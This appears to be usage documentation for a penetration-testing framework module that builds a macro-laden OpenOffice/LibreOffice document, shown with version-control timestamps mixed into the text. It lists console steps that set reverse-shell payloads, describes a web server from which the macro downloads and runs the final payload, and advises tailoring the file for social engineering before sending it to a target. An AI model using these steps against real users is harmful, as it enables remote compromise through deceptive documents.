2020-01-20 21:26:59 -05:00
|
|
|
## Vulnerable Application
|
2017-02-08 16:41:42 -06:00
|
|
|
|
|
|
|
|
This module generates an Apache OpenOffice Text Document with a malicious macro in it. It also
|
|
|
|
|
works against LibreOffice.
|
|
|
|
|
|
2017-02-09 11:53:11 -06:00
|
|
|
To exploit successfully, the targeted user must adjust the security level in Macro Security to
|
2017-02-08 16:41:42 -06:00
|
|
|
either Medium or Low. If set to Medium, a prompt is presented to the user to enable or disable the
|
|
|
|
|
macro. If set to Low, the macro can automatically run without any warning.
|
|
|
|
|
|
|
|
|
|
* Apache OpenOffice
|
|
|
|
|
* LibreOffice
|
|
|
|
|
|
|
|
|
|
## Verification Steps
|
|
|
|
|
|
2017-02-09 11:53:11 -06:00
|
|
|
To use this exploit, you must know the platform of the targeted user. The module supports Windows,
|
|
|
|
|
Linux, and OSX. If the target is using Windows, then the exploit will generate the macro
|
2017-02-08 16:41:42 -06:00
|
|
|
with malicious Powershell code inside. For other supported platforms, the exploit will generate
|
|
|
|
|
Python code.
|
|
|
|
|
|
|
|
|
|
An example of using this module against Windows:
|
|
|
|
|
|
|
|
|
|
1. Start msfconsole
|
|
|
|
|
2. ```use exploit/multi/misc/openoffice_document_macro```
|
|
|
|
|
3. ```set target 0```
|
|
|
|
|
4. ```set payload windows/meterpreter/reverse_tcp```
|
|
|
|
|
5. ```exploit```
|
|
|
|
|
|
|
|
|
|
An example of using this module against Linux or OSX:
|
|
|
|
|
|
|
|
|
|
1. Start msfconsole
|
|
|
|
|
2. ```use exploit/multi/misc/openoffice_document_macro```
|
|
|
|
|
3. ```set target 1```
|
|
|
|
|
4. ```set payload python/meterpreter/reverse_tcp```
|
|
|
|
|
5. ```exploit```
|
|
|
|
|
|
|
|
|
|
Once started, the module will mainly do these things:
|
|
|
|
|
|
|
|
|
|
1. It will start a payload handler.
|
|
|
|
|
2. It will start a web server. This is used for the macro to download and execute our final payload.
|
|
|
|
|
3. The malicious odt file. Send this to your targeted user.
|
|
|
|
|
|
|
|
|
|
## Options
|
|
|
|
|
|
|
|
|
|
**BODY**
|
|
|
|
|
|
|
|
|
|
This option can be used to insert text to the malicious document.
|
|
|
|
|
|
2020-01-20 21:26:59 -05:00
|
|
|
## Scenarios
|
2017-02-08 16:51:25 -06:00
|
|
|
|
|
|
|
|
|
|
|
|
|
|
2020-01-20 21:26:59 -05:00
|
|
|
### Modification
|
2017-02-08 16:41:42 -06:00
|
|
|
|
|
|
|
|
Since social engineering will play a big part in the success of the attack, you will most likely
|
|
|
|
|
want to modify the odt file.
|
|
|
|
|
|
|
|
|
|
1. To do so, first use msfconsole to generate the malicious odt file.
|
|
|
|
|
2. Move the odt file to a system that has OpenOffice or LibreOffice
|
|
|
|
|
3. You can just use OpenOffice/LibreOffice to edit the file. Make sure you don't modify the macro
|
|
|
|
|
code unless you actually know what you're doing.
|
|
|
|
|
|
